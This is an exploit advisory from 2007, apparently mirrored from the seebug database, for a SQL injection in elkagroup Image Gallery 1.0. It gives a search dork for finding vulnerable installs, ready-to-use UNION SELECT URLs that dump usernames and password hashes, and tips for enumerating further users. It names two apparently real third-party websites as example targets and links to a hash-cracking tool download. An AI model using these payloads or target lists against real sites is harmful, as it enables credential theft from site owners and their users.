elkagroup Image Gallery 1.0 Remote SQL Injection Vulnerability

2007-06-27T00:00:00
ID SSV:6978
Type seebug
Reporter Root
Modified 2007-06-27T00:00:00

Description

No description provided by source.

                                        
                                            
                                                --==+================================================================================+==--
--==+            Image Gallery 1.0 SQL Injection Vulnerbilitys                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog


SCRIPT DOWNLOAD: N/A


SITE: http://www.elkagroup.com/


DORK: intext:elkagroup  Image Gallery v1.0

DESCRIPTION: With this vuln you can display every user:hash in the database

EXPLOITS:

EXPLOIT 1: http://www.server.com/SCRIPT_PATH/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users



EXAMPLES:

EXAMPLE 1: http://www.abfa-esfahan.com/gallery/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users

EXAMPLE 2 (getting diffrent user): http://www.qanat.info/en/gallery/property.php?cid=0&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16%20from%20users%20%20where%20username%20not%20in%20(0x71616E6174696E)

NOTE/TIP: hex the first username you get with EXAMPLE 1 then use EXAMPLE 2 and replace the hex with your new hex, To get diffrent users.
Also sometimes te columns may vary so if its not working correct, add a few columns and remove a few, Enjoy.

NOTE/TIP: The md5 has 13 characters removed from the end.

Cracking Hashes: the hash this script uses is a modifed MD5 i have coded a tool for any type of md5 hash it works very well and is extremely fast while
leaveing your cpu untouched, download it here: http://www.h4cky0u-filez.org/5819352

GREETZ: str0ke, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+            Image Gallery 1.0 SQL Injection Vulnerbilitys                 +==--
--==+================================================================================+==--

# sebug.net